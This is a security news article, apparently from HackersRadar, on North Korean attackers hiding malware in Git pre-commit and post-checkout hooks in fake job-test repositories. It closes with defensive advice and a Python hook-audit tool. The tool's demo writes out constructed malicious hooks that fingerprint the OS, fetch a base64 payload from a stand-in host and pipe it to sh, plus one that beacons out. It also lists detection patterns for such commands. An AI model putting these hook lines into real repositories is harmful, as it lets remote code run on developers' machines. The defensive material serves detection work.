North Korean Hackers Use Git Hooks for Cross-Platform Malware Attacks
Key Takeaways
- North Korean threat actors, specifically the Lazarus Group, are leveraging Git hooks to deliver cross-platform malware.
- The attacks target software developers via fake job offers on platforms like LinkedIn, luring them into cloning malicious GitHub repositories.
- The malware, deployed as a “pre-commit” Git hook, is designed to steal cryptocurrency wallet data and credentials, and to establish persistent access across Windows, macOS, and Linux systems.
- This campaign, an evolution of the “Contagious Interview” operation, highlights a sophisticated shift toward weaponizing developer tools for initial access and payload delivery.
A new, highly sophisticated campaign attributed to North Korean state-sponsored hackers has emerged, demonstrating a significant evolution in their tactics. Rather than relying on traditional attack vectors, these threat actors are now embedding malicious code directly within Git hooks, a core feature of the version control system widely used by software developers. This strategic shift allows for the deployment of cross-platform malware by exploiting the very tools essential to modern development workflows.
This operation is a continuation of the long-running “Contagious Interview” campaign, previously linked to the notorious Lazarus Group. The attackers initiate contact with software developers on professional networking sites, such as LinkedIn, under the guise of legitimate recruitment opportunities. Following initial engagement, victims are presented with a technical coding assessment hosted on a GitHub repository. The moment a developer clones this repository, the infection chain is initiated.
Researchers at OpenSourceMalware were the first to identify and detail this novel technique. Their analysis revealed that the malicious script is concealed within the repository’s .githooks directory, specifically as a pre-commit hook. This design ensures that the payload executes automatically when the developer attempts to commit code, even before the commit object is fully written to the repository. The subtle nature of this attack, combined with developers’ inherent trust in job-related coding tasks, makes it particularly challenging to detect in its early stages.
Git Hooks: A Covert Delivery Mechanism
The deployed malware exhibits cross-platform capabilities. Upon activation, the hook script intelligently identifies the victim’s operating system, then silently communicates with a remote command-and-control (C2) server to fetch the appropriate malicious payload. This adaptive approach ensures that Windows users receive a specific malware variant, while macOS and Linux users are targeted with a different, tailored version.
Regardless of the operating system, the ultimate objectives of the attack remain consistent: exfiltrate cryptocurrency wallet data, harvest sensitive user credentials, and establish a persistent backdoor for remote access to the compromised machine.
Git hooks are an integral feature of Git, the distributed version control system utilized by virtually every developer globally. These automated scripts are designed to execute at predefined stages of the development lifecycle. Legitimate applications of Git hooks include enforcing coding standards, running automated tests, or validating commit messages before code is integrated.
In this malicious campaign, the Lazarus Group strategically places a harmful pre-commit hook within the GitHub repository provided to job candidates. The script itself is intentionally minimalist and appears benign upon superficial inspection. When a developer proceeds with a code commit, the hook silently runs in the background. It first fingerprints the operating system, then establishes contact with a remote server whose domain is crafted to mimic legitimate developer infrastructure.
The C2 server then delivers an OS-specific payload. For macOS and Linux systems, a shell script is provided, whereas Windows machines receive a batch-compatible payload. Both variants install persistent implants capable of stealing credentials, siphoning funds from cryptocurrency wallets, and maintaining communication with the attackers. All these malicious activities occur while the developer perceives a normal, successful commit operation.
Cross-Platform Malware and Persistence
The adaptability of this campaign across multiple operating systems is a notable feature. Most malware is designed with a single OS in mind, but this attack seamlessly delivers customized payloads for macOS, Linux, and Windows from a unified entry point. This level of operational flexibility underscores the capabilities of a well-resourced and experienced threat group, indicative of significant investment in maintaining active and sophisticated campaigns.
The implants utilized in this campaign are associated with known malware families previously employed by the Lazarus Group, including BeaverTail and InvisibleFerret. These tools are equipped with a range of functionalities, such as keylogging, remote access capabilities, browser data exfiltration, and general file theft. Furthermore, researchers have observed the use of “post-checkout” hooks. These hooks execute whenever a developer switches branches within the repository, providing the malware with additional opportunities to re-execute and maintain persistence without overt user interaction.
What You Should Do
- Exercise Extreme Caution with External Repositories: Treat any code repository received as part of a job application or from an unknown source as potentially malicious until thoroughly vetted.
- Inspect .githooks Directories: Before interacting with a new repository, manually inspect the .githooks directory for any suspicious scripts, especially pre-commit or post-checkout hooks. Look for unfamiliar commands, external network connections, or obfuscated code.
- Utilize Isolated Environments: Clone and execute unknown repositories within isolated virtual machines or sandboxed environments that do not contain sensitive data or credentials.
- Implement Organization-Wide Git Hook Policies: For development teams, establish and enforce policies for Git hook usage, potentially disallowing local hooks or requiring central management and approval of hook scripts.
- Monitor Network Traffic for Anomalies: Implement network monitoring to detect unusual outbound connections from developer workstations, particularly those originating from Git-related processes.
- Educate Developers on Social Engineering: Conduct regular training on social engineering tactics, especially those involving fake job offers or technical assessments designed to deliver malware.
- Report Suspicious Activity: Share any identified malicious Git hook patterns or related Indicators of Compromise (IoCs) with threat intelligence platforms and the wider security community to aid in rapid response and defense.
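The manual inspection recommended above can be scripted. The following audit tool is an added example written for this article; it is not code from HackersRadar, from the OpenSourceMalware researchers, or from the campaign itself. It relies on one Git behaviour worth knowing when reviewing a clone: Git executes hooks from .git/hooks by default, and a tracked .githooks directory only becomes live once core.hooksPath in .git/config points at it. The tool therefore checks all three locations, skips the *.sample files Git ships but never runs, and flags hook bodies that fetch from the network, pipe into a shell, decode or eval data, fingerprint the operating system, or run an inline interpreter, which matches the pre-commit and post-checkout behaviour described in the article. The demo repository, its three sample hooks and the updates.invalid host are constructed for this example.

```python
"""Audit the hooks of a freshly cloned repository before running any git command that fires them.

Added example (not from the article or the researchers). It inspects .git/hooks, any directory
named by core.hooksPath in .git/config, and a tracked .githooks directory, which Git only executes
once core.hooksPath points at it. The demo repository and its hooks are constructed.
"""
from __future__ import annotations

import os
import re
import stat
import tempfile
from pathlib import Path

# Hook names Git recognises; the article names pre-commit and post-checkout as the abused ones.
HOOK_NAMES = {
    "pre-commit", "prepare-commit-msg", "commit-msg", "post-commit", "pre-rebase",
    "post-checkout", "post-merge", "pre-push", "post-rewrite", "pre-auto-gc",
}

# Each hit marks a script for manual review; none of them alone proves the hook is malicious.
SUSPICIOUS = {
    "network_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|urllib\.request|requests\.(get|post)", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh|powershell)\b", re.I),
    "decode_or_eval": re.compile(r"\bbase64\b|\beval\b|\bexec\s*\(|Invoke-Expression|\biex\b", re.I),
    "os_fingerprint": re.compile(r"\buname\b|\bOSTYPE\b|platform\.system|\$env:OS", re.I),
    "inline_interpreter": re.compile(r"\b(python3?|node|perl|powershell)\s+-(c|e|enc|EncodedCommand)\b", re.I),
}


def configured_hooks_path(repo: Path) -> Path | None:
    """Return the directory named by core.hooksPath in .git/config, or None if unset."""
    config = repo / ".git" / "config"
    if not config.is_file():
        return None
    section = None
    for line in config.read_text(errors="replace").splitlines():
        line = line.strip()
        head = re.match(r"\[(\w+)", line)          # [core], [remote "origin"], ...
        if head:
            section = head.group(1).lower()
            continue
        key = re.match(r"hookspath\s*=\s*(.+)", line, re.I)
        if key and section == "core":
            value = key.group(1).strip()
            # Git resolves a relative hooksPath against the working tree root.
            return Path(value) if os.path.isabs(value) else repo / value
    return None


def scan_script(text: str) -> list[str]:
    """Return the names of the SUSPICIOUS patterns found in a hook body, sorted."""
    return sorted(name for name, pattern in SUSPICIOUS.items() if pattern.search(text))


def audit(repo: Path) -> dict:
    """Report every hook script Git may run for this clone, with its review findings."""
    configured = configured_hooks_path(repo)
    active_dir = configured if configured is not None else repo / ".git" / "hooks"
    candidates = [(active_dir, True)]
    tracked = repo / ".githooks"
    if tracked.is_dir() and (not active_dir.exists() or not tracked.samefile(active_dir)):
        candidates.append((tracked, False))  # shipped in the tree but not wired up (yet)
    hooks = []
    for directory, active in candidates:
        if not directory.is_dir():
            continue
        for path in sorted(directory.iterdir()):
            if not path.is_file() or path.name.endswith(".sample"):
                continue  # Git ships *.sample files and never executes them
            hooks.append({
                "hook": path.name,
                "path": str(path),
                "known_hook_name": path.name in HOOK_NAMES,
                "active": active,                       # will Git run it as configured right now?
                "executable": bool(path.stat().st_mode & stat.S_IXUSR),  # Git skips non-executables
                "findings": scan_script(path.read_text(errors="replace")),
            })
    return {"hooks_path": None if configured is None else str(configured), "hooks": hooks}


def build_demo_repo(root: Path, wire_hooks_path: bool = True) -> Path:
    """Create a constructed clone layout: one benign and two suspicious tracked hooks."""
    (root / ".git" / "hooks").mkdir(parents=True)
    (root / ".git" / "hooks" / "pre-commit.sample").write_text("#!/bin/sh\nexit 0\n")
    config = "[core]\n\trepositoryformatversion = 0\n"
    if wire_hooks_path:
        config += "\thooksPath = .githooks\n"
    (root / ".git" / "config").write_text(config)
    hooks = root / ".githooks"
    hooks.mkdir()
    samples = {
        # constructed: probes the OS, then pulls and runs a second stage from a remote host
        "pre-commit": '#!/bin/sh\nos="$(uname -s)"\n'
                      'curl -fsSL "https://updates.invalid/stage?os=$os" | base64 -d | sh\nexit 0\n',
        # constructed: re-fires on every branch switch through an inline interpreter
        "post-checkout": "#!/bin/sh\npython3 -c \"import urllib.request as u; "
                         "u.urlopen('https://updates.invalid/beacon')\" >/dev/null 2>&1\nexit 0\n",
        # constructed: the kind of hook a team legitimately ships (lint before push)
        "pre-push": "#!/bin/sh\nnpx eslint --max-warnings 0 . || exit 1\n",
        "pre-rebase.sample": "#!/bin/sh\nexit 0\n",
    }
    for name, body in samples.items():
        path = hooks / name
        path.write_text(body)
        path.chmod(0o755)
    return root


def demo(wire_hooks_path: bool = True) -> dict:
    """Build the constructed repository in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp(prefix="hook-audit-"))
    return audit(build_demo_repo(root, wire_hooks_path))


if __name__ == "__main__":
    report = demo()
    print("core.hooksPath:", report["hooks_path"])
    for hook in report["hooks"]:
        status = "ACTIVE" if hook["active"] else "inactive"
        print(f"{hook['hook']:<16} {status:<9} {', '.join(hook['findings']) or 'no findings'}")
```

Run it as `python hook_audit.py` to see the constructed repository scored, or call `audit(Path("/path/to/clone"))` on a real clone before the first commit or branch switch. Two design points: the "active" flag separates a hook Git will run right now from one that merely sits in the tree waiting for a setup step to enable it, and the pattern hits are deliberately broad, so the output is a review queue rather than a verdict. For the organization-wide policy item above, pinning core.hooksPath to a centrally managed, read-only directory makes a repository-shipped hook inert until someone consciously overrides that setting.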
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.